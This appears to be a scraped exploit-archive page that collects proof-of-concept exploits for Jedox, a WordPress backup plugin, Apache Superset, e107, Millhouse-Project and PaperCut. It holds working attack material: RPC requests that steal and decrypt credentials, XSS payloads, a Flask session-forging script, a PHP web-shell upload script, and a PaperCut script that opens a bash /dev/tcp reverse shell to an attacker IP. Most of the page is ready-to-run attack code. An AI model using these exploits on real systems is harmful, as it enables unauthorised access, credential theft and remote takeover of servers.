# Exploit Title: Jedox 2022.4.2 - Code Execution via RPC Interfaces # Date: 28/04/2023 # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL # Vendor Homepage: https://jedox.com # Version: Jedox 2022.4 (22.4.2) and older # CVE : CVE-2022-47879 Introduction ================= A Remote Code Execution (RCE) vulnerability in /be/rpc.php and /be/erpc.php allows remote authenticated users to load arbitrary PHP classes from the rtn directory and to execute its methods. To exploit this vulnerability, the attacker needs knowledge about loadable classes, their methods and arguments. Write-Up ================= See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability. Proof of Concept ================= 1) The `Studio::getUserCreds` function can be used to read the clear text credentials of the currently authenticated user. PATH: /be/rpc.php METHOD: POST BODY: [ [ "Studio", "getUserCreds" ] ] 2) Using function `conn::test_palo`, an outgoing HTTP connection can be initiated from the web server to an attacker controlled server (Specify HOST and PORT) with the authenticated user's credentials. This could leak cleartext credentials to an attacker. PATH: /be/rpc.php METHOD: POST BODY: [ [ "conn", "test_palo", [ "<HOST>", "<PORT>", "", "", true, null ] ] ] 3) The function `Studio::getExternURI` can be used to generate a URL with embedded username and encrypted password of the currently authenticated user. PATH: /be/rpc.php METHOD: POST BODY: [ [ "Studio", "getExternURI", [ 0, "", [ 0 ], { "flag":1 } ] ] ] 4) List all available database connections via `conn::ls`: PATH: /be/rpc.php METHOD: POST BODY: [ [ "conn", "ls", [ null, false, true, [ "type", "active", "description" ] ] ] ] 5) Retrieve details of individual database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`: PATH: /tc/rpc METHOD: POST BODY: [ [ "com.jedox.etl.mngr.Connections", "getGlobalConnection", [ "<CONNECTION>" ] ] ] 6) Some functions return credentials only in encrypted form. However, they can be decrypted by any user using `common::decrypt` (specify encrypted credentials via ENCRYPTEDCREDS): PATH: /be/rpc.php METHOD: POST BODY: [ [ "common", "decrypt", [ "<ENCRYPTEDCREDS>" ] ] ] 7) Using `common::paloGet` it is possible to read arbitrary configuration parameters (specify config param via CONFIG. For example, the password of the SMTP server can be read with it (CONFIG: tasks.smtp.password): PATH: /be/rpc.php METHOD: POST BODY: [ [ "common", "paloGet", [ null, "Config", "#_config", [ "config" ], { "config": [ "<CONFIG>" ] }, true, true ] ] ] 8) The function `palo_mgmt::sess_list` can be used to retrieve a list of all active user sessions. The session information includes not only the username but also the user's IP address, information about the browser and other data. PATH: /be/rpc.php METHOD: POST BODY: [ [ "palo_mgmt", "sess_list", [ null ] ] ] 9) The function `palo_mgmt::lic_users_list` returns a list of all users stored in the system: PATH: /be/rpc.php METHOD: POST BODY: [ [ "palo_mgmt", "lic_users_list", [ "0" ] ] ]
HireHackking

Jedox 2022.4.2 - Remote Code Execution via Directory Traversal

HACKER · %s · %s

# Exploit Title: Jedox 2022.4.2 - Remote Code Execution via Directory Traversal # Date: 28/04/2023 # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL # Vendor Homepage: https://jedox.com # Version: Jedox 2022.4 (22.4.2) and older # CVE : CVE-2022-47875 Introduction ================= A Directory Traversal vulnerability in /be/erpc.php allows remote authenticated users to execute arbitrary code. To exploit the vulnerability, the attacker must have the permissions to upload files. Write-Up ================= See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability. Proof of Concept ================= 1) This vulnerability can be exploited by first uploading a file using one of the existing file upload mechanisms (e.g. Import in Designer). When uploading a file, the web application returns the file system path in the JSON body of the HTTP response (look for `fspath`). 2) Upload a PHP file and note the file system path (`fspath`) 3) Get RCE via Directory Traversal PATH: /be/erpc.php?c=../../../../../fspath/of/uploaded/file/rce.php METHOD: POST
HireHackking

Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module

HACKER · %s · %s

# Exploit Title: Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module # Date: 28/04/2023 # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL # Vendor Homepage: https://jedox.com # Version: Jedox 2020.2 (20.2.5) and older # CVE : CVE-2022-47877 Introduction ================= A Stored cross-site scripting vulnerability allows remote authenticated users to inject arbitrary web scripts or HTML in the logs page via the log module. To exploit the vulnerability, the attacker must append an XSS payload to the log message. Write-Up ================= See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability. Proof of Concept ================= 1) Store log entry with XSS payload: PATH: /ub/ccmd METHOD: POST BODY: [ [ "log", "error", "<img src=# onerror=\"alert('XSS')\">" ] ] 2) Trigger XSS payload by opening the Logs page and showing the respective log entry.
HireHackking
# Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts # Date: 28/04/2023 # Exploit Author: Syslifters - Christoph Mahrl, Aron Molnar, Patrick Pirker and Michael Wedl # Vendor Homepage: https://jedox.com # Version: Jedox 2020.2 (20.2.5) and older # CVE : CVE-2022-47876 Introduction ================= Jedox Integrator allows remote authenticated users to create Jobs to execute arbitrary code via Groovy-scripts. To exploit the vulnerability, the attacker must be able to create a Groovy-Job in Integrator. Write-Up ================= See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability. Proof of Concept ================= 1) A user with appropriate permissions can create Groovy jobs in the Integrator with arbitrary script code. Run the following groovy script to execute `whoami`. The output of the command can be viewed in the logs: def sout = new StringBuilder(), serr = new StringBuilder() def proc = 'whoami'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(10000) LOG.error(sout.toString()); LOG.error(serr.toString());
HireHackking
# Exploit Title: WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup # Google Dork: intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/") # Date: 2023-05-10 # Exploit Author: Wadeek # Vendor Homepage: https://backupbliss.com/ # Software Link: https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip # Version: 1.2.8 # Tested on: WordPress 6.2 1) Get the version of the plugin. => GET /wp-content/plugins/backup-backup/readme.txt -------------------------------------------------------------------------- Stable tag: 1.2.8 -------------------------------------------------------------------------- 2) Get the name of the backup directory. => GET /wp-content/backup-migration/config.json -------------------------------------------------------------------------- { [...], "STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx", [...], "OTHER:EMAIL":"admin@email.com" } -------------------------------------------------------------------------- 3) Get the name of the archive containing the backups. => GET /wp-content/backup-migration/complete_logs.log -------------------------------------------------------------------------- BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip -------------------------------------------------------------------------- 4) Build the path for the download. => GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
HireHackking

Apache Superset 2.0.0 - Authentication Bypass

HACKER · %s · %s

# Exploit Title: Apache Superset 2.0.0 - Authentication Bypass # Date: 10 May 2023 # Exploit Author: MaanVader # Vendor Homepage: https://superset.apache.org/ # Version: Apache Superset<= 2.0.1 # Tested on: 2.0.0 # CVE: CVE-2023-27524 from flask_unsign import session import requests import urllib3 import argparse import re from time import sleep from selenium import webdriver from urllib.parse import urlparse urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) SECRET_KEYS = [ b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h', # version < 1.4.1 b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', # version >= 1.4.1 b'thisISaSECRET_1234', # deployment template b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY', # documentation b'TEST_NON_DEV_SECRET' # docker compose ] def main(): parser = argparse.ArgumentParser() parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True) parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1') args = parser.parse_args() try: u = args.url.rstrip('/') + '/login/' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0' } resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False) if resp.status_code != 200: print(f'Error retrieving login page at {u}, status code: {resp.status_code}') return session_cookie = None for c in resp.cookies: if c.name == 'session': session_cookie = c.value break if not session_cookie: print('Error: No session cookie found') return print(f'Got session cookie: {session_cookie}') try: decoded = session.decode(session_cookie) print(f'Decoded session cookie: {decoded}') except: print('Error: Not a Flask session cookie') return match = re.search(r'"version_string": "(.*?)&#34', resp.text) if match: version = match.group(1) else: version = 'Unknown' print(f'Superset Version: {version}') for i, k in enumerate(SECRET_KEYS): cracked = session.verify(session_cookie, k) if cracked: break if not cracked: print('Failed to crack session cookie') return print(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}') try: user_id = int(args.id) except: user_id = args.id forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k) print(f'Forged session cookie for user {user_id}: {forged_cookie}') u1 = args.url.rstrip('/') + '/superset/welcome' print(f"Now visit the url: `{u1}` and replace the current session cookie with this `{forged_cookie}` and refresh the page and we will be logged in as admin to the dashboard:)") except Exception as e: print(f'Unexpected error: {e}') if __name__ == '__main__': main()
HireHackking

e107 v2.3.2 - Reflected XSS

HACKER · %s · %s

# Exploit Title: e107 v2.3.2 - Reflected XSS # Date: 11/05/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://e107.org/ # Software Link: https://e107.org/download # Version: 2.3.2 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### XSS Reflected - unauthorized URL: http://127.0.0.1/e107/e107_plugins/tinymce4/plugins/e107/parser.php Parameters: content # POC Request: POST /e107/e107_plugins/tinymce4/plugins/e107/parser.php HTTP/1.1 Host: 127.0.0.1 Content-Length: 1126 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" Accept: text/html, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://127.0.0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3 Accept-Encoding: gzip, deflate Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close content=%5Bhtml%5D%3Cp%3E%3Cstrong%3ELore"/><script>alert(1)</script>bb&mode=tohtml Response: HTTP/1.1 200 OK Date: Thu, 11 May 2023 19:38:45 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Set-Cookie: PHPSESSID=c4mphnf1igb7lbibn4q1eni10h; expires=Fri, 12-May-2023 19:38:45 GMT; Max-Age=86400; path=/e107/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 1053 Connection: close Content-Type: text/html; charset=UTF-8 <!-- bbcode-html-start --><p><strong>Lore"/><script>alert(1)</script>bb ### XSS Reflected - Authorized URL: http://127.0.0.1/e107/e107_admin/image.php Parameters: for # POC 1 Request: GET /e107/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1 HTTP/1.1 Host: 127.0.0.1 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Connection: close Response: HTTP/1.1 200 OK Date: Thu, 04 May 2023 03:07:35 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "37f107dbe6a998ecf7b71689627c2a56" Content-Length: 12420 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html lang="en"> <head> <title>Media Manager - Admin Area :: hacked">bbbbb</title> <meta charset='utf-8' /> <meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" /> <!-- *CSS* --> [...] <div id="uploader" data-max-size="2mb" rel="/e107/e107_web/js/plupload/upload.php?for=_commonh5it1"><img src=a onerror=alert(1)>dezaw&path="> <p>No HTML5 support.</p> </div> [...] # POC 2 URL: http://127.0.0.1/e107/e107_admin/newspost.php Parameters: Payload in URL Request: GET /e107/e107_admin/newspost.php/sdd4h"><script>alert(1)</script>kzb89?mode=main&action=list HTTP/1.1 Host: 127.0.0.1 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3 Accept-Encoding: gzip, deflate Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=ftq2gnr1kgjqhfa3u902thraa8 Connection: close Response: HTTP/1.1 200 OK Date: Fri, 05 May 2023 06:21:53 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "d127dd6a44a22e093fed60b83bf36af2" Content-Length: 72914 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html lang="en"> <head> <title>News - List - Admin Area :: hacked">bbbbb</title> <meta charset='utf-8' /> <meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" /> <!-- *CSS* --> [...] <a class="btn btn-default btn-secondary nextprev-item next " href="http://127.0.0.1/e107/e107_admin/newspost.php/sdd4h"> <script>alert(1)</script>kzb89/?mode=main&action=list&from=10" title="Go to the next page" ><i class="fa fa-forward"></i></a> [...]
HireHackking

thrsrossi Millhouse-Project 1.414 - Remote Code Execution

HACKER · %s · %s

<?php /* Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code Execution Date: 12/05/2023 Exploit Author: Chokri Hammedi Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project Software Link: https://github.com/thrsrossi/Millhouse-Project.git Version: 1.414 Tested on: Debian CVE: N/A */ $options = getopt('u:c:'); if(!isset($options['u'], $options['c'])) die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi \n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n \033[0m\n \n"); $target = $options['u']; $command = $options['c']; $url = $target . '/includes/add_post_sql.php'; $post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition: form-data; name="title" helloworld ------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition: form-data; name="description" <p>sdsdsds</p> ------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition: form-data; name="files"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition: form-data; name="category" 1 ------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition: form-data; name="image"; filename="rose.php" Content-Type: application/x-php <?php $shell = shell_exec("' . $command . '"); echo $shell; ?> ------WebKitFormBoundaryzlHN0BEvvaJsDgh8-- '; $headers = array( 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8', 'Cookie: PHPSESSID=rose1337', ); $ch = curl_init($url); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, true); $response = curl_exec($ch); curl_close($ch); // execute command $shell = "{$target}/images/rose.php?cmd=" . urlencode($command); $ch = curl_init($shell); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $exec_shell = curl_exec($ch); curl_close($ch); echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n"; ?>
HireHackking

PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE) # Date: 13 May 2023 # Exploit Author: Mohin Paramasivam (Shad0wQu35t) and MaanVader # Vendor Homepage: https://www.papercut.com/ # Version: 8.0 or later # Tested on: 22.0.4 # CVE: CVE-2023-27350 import requests import argparse Group_payload = { "service":"direct/1/OptionsUserSync/$OptionsUserSource.$Form", "sp":"S0", "Form0":"$Hidden,$Hidden$0,$Hidden$1,$PropertySelection,$Hidden$2,$Hidden$3,$Hidden$4,$Hidden$5,$Hidden$6,$Hidden$7,$Hidden$8,$Hidden$9,$Hidden$10,$Hidden$11,$Hidden$12,$Hidden$13,$Hidden$14,$TextField,$TextField$0,$RadioGroup,$Submit,$Checkbox$2,primaryCardIdLength,$Checkbox$3,secondaryCardIdLength,$Checkbox$5,$Hidden$15,$Hidden$16,$Hidden$17,$Hidden$18,$Hidden$19,$Hidden$20,$Hidden$21,$PropertySelection$4,$TextField$13,$Checkbox$6,$TextField$14,$TextField$15,$TextField$16,$RadioGroup$0,$Submit$1,$PropertySelection$5,$TextField$17,$PropertySelection$6,$TextField$18,primaryCardId2Length,$PropertySelection$7,$TextField$19,secondaryCardId2Length,$Checkbox$7,$TextField$20,$Checkbox$8,$Checkbox$9,$Checkbox$10,$Submit$2,$Submit$3,$Submit$4,$Submit$5", "$Hidden":"Sf278fd737ffcaed6eb3d1f67c2ba5c6d", "$Hidden$0":"F", "$Hidden$1":"F", "$Hidden$2":"OH4sIAAAAAAAAAJWQwUrDQBCGp60VBBUp4lWRnncRPIjSg4iHwrYNpBU8xXW7JitJdp1sis2hF5_BlxBP-lw-gF50Y2Mp6MW5DTP_fP8_z2_QzBDotSqI4UaiyC0xIg1JJnGihCQDY5VOs5HrfZ2jkMOpkVeHny8bD8VeHVa6sBYYVBqVnTLYCnhuIw91iDzxuI0stNgtn3Aa8zSkvkWVhies1MTc3mhMLBwzR6c_dFrSaUWnf9LbXqV1h3aCfDFbwt7BDGr3CO3fwXKrYsK04LEq5Pg8zZPex26j87i-XQdwkn2NIeGGi0gSoZPE4Ulpnki3mpFS8N556r4eXBR1qDFoqj5P5BxoLKyejfzhoAcAYzNDOPrnZxfZoKrWt6nN8odzG6WB5aFjNk77l-YLeZfbs8sBAAA.", "$Hidden$3":"F", "$Hidden$4":"X", "$Hidden$5":"X", "$Hidden$6":"X", "$Hidden$7":"X", "$Hidden$8":"X", "$Hidden$9":"X", "$Hidden$10":"X", "$Hidden$11":"X", "$Hidden$12":"X", "$Hidden$13":"F", "$Hidden$14":"X", "$Hidden$15":"F", "$Hidden$16":"S", "$Hidden$17":"S", "$Hidden$18":"S", "$Hidden$19":"S", "$Hidden$20":"F", "$Hidden$21":"SSTANDARD_UNIX", "$PropertySelection":"3,CUSTOM", "$TextField":"/usr/bin/python3", "$TextField$0":"/usr/bin/python3", "$RadioGroup":"0", "primaryCardIdLength":"8", "secondaryCardIdLength":"8", "$PropertySelection$4":"0,STANDARD_UNIX", "$TextField$13":"", "$TextField$14":"", "$TextField$15":"", "$TextField$16":"", "$RadioGroup$0":"0", "$PropertySelection$5":"NONE", "$TextField$17":"", "$PropertySelection$6":"NONE", "$TextField$18":"employeeNumber", "primaryCardId2Length":"8", "$PropertySelection$7":"NONE", "$TextField$19":"", "secondaryCardId2Length":"8", "$TextField$20":"", "$Submit$4":"Apply" } parser = argparse.ArgumentParser(description="Papercut RCE") parser.add_argument('--url',help='Url of the vunerable application example http://10.2.3.4:9191 dont need the trailing /') parser.add_argument('--ip',help='our rev shell ip') parser.add_argument('--port',help='our rev shell port') args = parser.parse_args() url = args.url ip = args.ip port = args.port passwd_input = f"import os;os.system(\"/bin/bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'\")" final_payload = { "service":"direct/1/Home/$Form$0", "sp":"S0", "Form0":"$Hidden$0,$Hidden$1,inputUsername,inputPassword,$PropertySelection$0,$Submit$0", "$Hidden$0":"true", "$Hidden$1":"X", "inputUsername":"help", "inputPassword":passwd_input, "$PropertySelection$0":"en", "$Submit$0":"Log+in" } # create a session session = requests.Session() # visit the first URL to set up the session setup_url = url+"/app?service=page/SetupCompleted" response = session.get(setup_url) response.raise_for_status() # check for any errors # visit the second URL using the same session dashboard_url = url+"/app?service=page/Dashboard" response = session.get(dashboard_url) response.raise_for_status() # check for any errors # URL to change user group user_group_change_url = url+"/app" response = session.post(user_group_change_url,data=Group_payload) response.raise_for_status() # check for errors # URL to gain RCE rce_url = url+"/app" response = session.post(rce_url,data=final_payload) response.raise_for_status() # Check for any errors # print the response text print(response.text)